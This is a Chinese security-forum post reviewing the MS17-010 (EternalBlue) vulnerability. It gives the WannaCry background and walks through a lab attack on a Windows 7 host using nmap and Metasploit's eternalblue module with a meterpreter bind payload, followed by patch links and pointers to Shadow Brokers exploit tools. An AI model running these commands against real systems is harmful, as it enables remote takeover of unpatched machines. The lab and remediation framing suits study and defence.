安全矩阵

 找回密码
 立即注册
搜索
查看: 5113|回复: 0

MS17-010漏洞回顾

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-5-17 21:17:17 | 显示全部楼层 |阅读模式
原文链接:MS17-010漏洞回顾

漏洞介绍
永恒之蓝(英语:EternalBlue)是美国国家安全局挖掘出的漏洞,于2017年4月14日被黑客组织Shadow Brokers泄漏。该漏洞利用Windows系统SMB文件分享协议445/TCP端口进行攻击。




尽管微软于2017年3月14日已经发布过Microsoft Windows补丁修补了这个漏洞,然而在5月12日WannaCry勒索软件利用这个漏洞传播时,很多用户仍然因为没有安装补丁而受害。
由于WannaCry的严重性,微软于2017年5月13日为已超过支持周期的Microsoft Windows XP、Microsoft Windows 8和Windows Server 2003发布了紧急安全更新,以阻止其散布造成更大的危害


漏洞发现
靶机:Win7 x64  10.0.0.128
攻击机:Kali x64  10.0.0.129
使用nmap对目标进行端口扫描
nmap -sS -sV -p 1-65535 -A -T4 10.0.0.128


发现tcp/445端口开放,使用nmap自带脚本库扫描目标是否存在MS17-010漏洞
  1. nmap -p 445 --script=vuln 10.0.0.128
复制代码


nmap扫描到存在ms17-010漏洞;这也可以使用Metasploit检测
启动Metasploit

  1. msfdb run
复制代码



搜索ms17-010先关模块
  1. msf5 > search ms17-010
复制代码


使用检测模块
  1. msf5 > use auxiliary/scanner/smb/smb_ms17_010
复制代码
设置响应参数
  1. msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.0.0.128
  2. msf5 auxiliary(scanner/smb/smb_ms17_010) > run
复制代码


msf也发现存在漏洞。


漏洞利用
继续使用msf模块利用该漏洞
  1. msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
复制代码
查看漏洞模块相应参数
  1. msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
复制代码


设置参数项
  1. msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.0.0.128
复制代码

设置正连的payload
  1. msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
复制代码

再次查看参数


运行漏洞模块
  1. msf5 exploit(windows/smb/ms17_010_eternalblue) > run
复制代码



成功与目标创建一个session会话,查看当前权限




漏洞修复
对Windows系统各版本进行修复:
Win-xp(32)
http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-chs_dca9b5adddad778cfd4b7349ff54b51677f36775.exe
Win-xp(64)
http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe

Win-2003SP2(32)
http://download.windowsupdate.co ... 5f041ecede54b80.exe

Win-2003SP2(64)
http://download.windowsupdate.co ... 3baee8de11316b9.exe

win2008R2
http://download.windowsupdate.co ... 09a992d8c4e92b3.msu
http://download.windowsupdate.co ... aefbe7f9009c72b.msu

Win7(32)
http://download.windowsupdate.co ... e7169812914df3f.msu
http://download.windowsupdate.co ... 2143dabe5561a66.msu

Win7(64)
http://download.windowsupdate.co ... 09a992d8c4e92b3.msu
http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/03/windows6.1-kb4012215-x64_a777b8c251dcd8378ecdafa81aefbe7f9009c72b.msu

针对目标机进行相应补丁修复,再次检测是否存在MS17-010漏洞,显示
漏洞已检测不到。


漏洞扩展
在Metasploit中MS17-010漏洞利用模块攻击目标只有win2008(64)和Win7(64),而在实际渗透中可能会遇到有MS17-010漏洞的其他系统,如何利用了?

工具:
https://github.com/ElevenPaths/E ... lepulsar-Metasploit
https://github.com/misterch0c/shadowbroker


最后,附上一张win7(32)位成功被攻击界面




如果你对漏洞模块不会使用,或是获得权限后不稳定、容易掉线的小伙伴请小桌板留言吧!!!


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-9-19 09:06 , Processed in 0.012709 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表